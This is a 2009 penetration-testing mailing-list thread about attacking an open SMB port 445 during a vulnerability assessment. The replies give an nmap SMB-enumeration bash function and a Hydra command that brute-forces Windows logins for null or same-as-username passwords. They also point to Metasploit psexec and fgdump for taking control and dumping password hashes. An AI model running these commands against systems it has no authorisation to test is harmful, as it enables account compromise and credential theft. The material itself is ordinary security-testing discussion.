Exploiting IPC$

["Adrian Puente Z." <apuente () hackarandas com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I recommend the SuperScan4 thar runs on windows.

http://www.foundstone.com/us/resources/proddesc/superscan.htm

I also use this bash script that runs with Nmap Version 5.00 or later in
backrack.


function nmapenumsmb
{
        if [ $# -eq 0 ]
        then
                echo -e "Sintaxis: nmapenumsmb <IP>"
                exit 1
        fi

        `which nmap` -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.$1 $1
        echo Getting users
        echo "Login;Type;Domain;RID;Full Name;Description;Flags;Source"
> nmap.enum.users.notdisabled.$1.csv
        grep -B1 -A6 -e 'Type: User' nmap.enum.$1.nmap | tee
nmap.enum.usuarios.$1.txt \
                | tr -d '\n'  | sed 's/|\ \ [a-zA-Z0-9]/\n&/g;s/^|\ \
//g;s/|\ \ \ \ |_\ /;/g' | grep -v "Account disabled" \
                | sed 's/^|\ \ //g;s/|\ \ \ \ |_\ /;/g;s/:\ /;/g' | cut
- -d\; -f1,3,5,7,9,11,13,15,17 \
                | grep \;User\; | tee -a
nmap.enum.users.notdisabled.$1.csv \
                | grep -ve '\$'
nmap.enum.users.notdisabled.notmachines.$1.csv
}

You add it to your ~/.bashrc and run it as nmapenumsmb IP and generate
some pretty CSV files with the enumeration information.

Or just nmap -n -d -p445 --script=smb-enum* -vv -oA nmap.enum.IP IP

You can also use Cain from www.toxid.it to make the SID brute force user
enumeration.

Then  I use the hydra to test the users for same or null password . It
always works. Then you can use Super Scan to know who's Admin.

hydra -w 10 -V -L lst.users.1.per.line  -es -o passwods.hydra.txt IP
smbnt -m GROUP:Domain.com.mx -m D

If you get Admin I recommend Metasploit with the smbpsexec module or
fgdump from foofus to get control/hashes of the machine. Have fun


On Wed, Dec 30, 2009 at 5:38 AM, Halley Souza <souza.halley () gmail com>
wrote:
> Try nmap scripts smb-enum-shares and smb-brute, always result =)
>
> Halley
>
> > 2009/12/29 Jerome Athias <jerome.athias () free fr>
> > > scan/check for administrative shares
> > > Admin$
> > > C$
> > >
> > > (you can find a ton of tools for this task)
> > >
> > > then you can try a bruteforce attack
> > > https://www.securinfos.info/outils-securite-hacking/ipc$crack.rar
> > > THCHydra
> > > ...
> > >
> > > RPC/DCOM sploits
> > > Metasploit Framework
> > >
> > > G00D L\_/CK
> > > And Happy New Hacking Y3aR!
> > >
> > > /JA
> > >
> > > Le 28/12/2009 12:11, Himanshu Goyal a écrit :
> > > > Hello,
> > > >
> > > > Can somebody share how to exploit port 445. I am doing a VA and found
> > > > port 445 open.
> > > >
> > > > When I try to connect IPC$, it says access denied.
> > > >
> > > > Thanks
> > > >
> > > > Cheers-
> > > > Himanshu
- ------------------------------------------------------------------------
> > > > This list is sponsored by: Information Assurance Certification
Review Board
> > > > Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.
> > > > http://www.iacertification.org
- ------------------------------------------------------------------------
> > > >
> > >
> > > ------------------------------------------------------------------------
> > > This list is sponsored by: Information Assurance Certification
Review Board
> > > Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.
> > > http://www.iacertification.org
> > > ------------------------------------------------------------------------
>
> ------------------------------------------------------------------------
> This list is sponsored by: Information Assurance Certification Review
Board
> Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require
a full practical examination in order to become certified.
> http://www.iacertification.org
> ------------------------------------------------------------------------


- --
Adrián Puente Z.
[www.hackarandas.com]
Donde las ideas se dispersan en bytes...

"... ruego a mi orgullo que se acompañe siempre de mi prudencia,
y si algún día mi prudencia se echara a volar, que al menos
pueda volar junto con mi locura"
        --Nietzche

Huella: FBD6 4C36 2557 C64C 1318  70A8 F561 CB6F 4E40 5AFB
http://www.hackarandas.com/apuente_at_hackarandas.com.asc.gz
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktEFiMACgkQW2tF/eN2yfaeKgCeO7VBfCiOIBKVNk7s3pkbKB+l
KyEAn3rnu6rd1tZTj5LLV6Ap6j8z1crk
=mJ0x
-----END PGP SIGNATURE-----

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------